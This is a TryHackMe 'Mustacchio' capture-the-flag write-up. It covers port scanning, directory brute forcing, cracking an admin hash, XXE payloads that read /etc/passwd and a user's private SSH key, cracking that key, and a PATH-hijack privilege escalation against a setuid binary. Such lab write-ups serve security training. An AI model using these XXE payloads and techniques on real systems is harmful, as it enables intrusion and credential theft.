Mustacchio — TryHackMe


Another easy boot2root room. We first needed to enumerate a bit to find out what is running and then doing directory Brute forcing to find a sqlite3 db dump, which gave us the admin password.Then using that password we logged in to the admin portal where there was a XXE vulnerability which was exploited to give us the user’s SSH encrypted key which was cracked with ssh2john. Privesc involved exploiting a suid binary.

This room is available here:

So as usual let’s start enumerating the machine with nmap:


# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p-

22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-https

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,8765

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login

So, we have SSH port open and 2 web server ports open. Let’s use FFUF to check if any useful directory is exposed:


# Perform directory brute forcing using ffuf
⇒ ffuf -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c

        /'___\  /'___\           /'___\       
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
custom [Status: 301, Size: 315, Words: 20, Lines: 10]
images [Status: 301, Size: 315, Words: 20, Lines: 10]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10]
[Status: 200, Size: 1752, Words: 77, Lines: 73]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [220546/220546] :: Job [1/1] :: 1957 req/sec :: Duration: [0:02:17] :: Errors: 0 ::

We can see a directory called “custom” is there. Let’s explore it:

custom dir


Users.bak looks to be a database dump:


Explore it using sqlitebroswer and it gives us a user ‘admin’ and a hashed password:


The hash is easily cracked at :


Admin Portal

There was one more web port open which nmap had told use earlier. Accessing that at port 8765 gives us a admin login portal:

admin portal

Using the admin user and password found above, we are able to login. Also just clicking the submit button gives us a pop up — Insert XML code!

admin portal

Also capture this request in Burp Suite:

captured BURP request

Few things are revealed here:

Checking auth/dontforget.bak indeed gave us a n example XML request:

kali@kali:~$ cat /tmp/dontforget.bak 
<?xml version="1.0" encoding="UTF-8"?>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space....</com>

From this it is pretty clear now that we have XXE vulnerability here and we need to exploit it to get out first flag.

XXE Payload

Found some useful XXE payloads here :

Combining the XML request and the payloads, here is a POC which gave us the password file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<author>Barry Clad</author>
able to read passwd file

So we can use this POC to read the user Barry’s Private SSH key:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///home/barry/.ssh/id_rsa"> ]>
<author>Barry Clad</author>

We got the private key for the user Barry but the key is encrypted. Let’s use ssh2john and john to decrypt the key:

python /opt/tools/ id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
ssh key decrypted using ssh2john

User Flag

So we now have the SSH key for user Barry along with the passphrase for that SSH key. Change the permission to the SSH keys to 600 and then login using the following command:

ssh using private key

User.txt was in the user Barry’s home dir:

user’s flag

Privilege Escalation

Running Linux Smart Enumeration Script we found an uncommon setuid binary: found setuid binary

This is that binary with setuid bit set and it is owned by root :

binary owned by root

Let’s analyze this binary using strings :

This binary looks to be Ngnix log reader. It is using tail command to read access.log but without the full path. We can exploit that and put in our own “tail” binary and use it to do privilege escalation. First we need to change the PATH variable, so that our binary is executed first:

barry@mustacchio:~$ echo $PATH
barry@mustacchio:~$ PATH=/home/barry:$PATH
barry@mustacchio:~$ echo $PATH

Then let’s make a new file in /home/barry named tail :

barry@mustacchio:~$ cat tail 
barry@mustacchio:~$ chmod +x tail

Now execute the suid binary /home/joe/live_log :


/bin/bash was executed as root and we got the root shell and then the root flag. Game over!

That’s it for this room. Thanks for reading.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store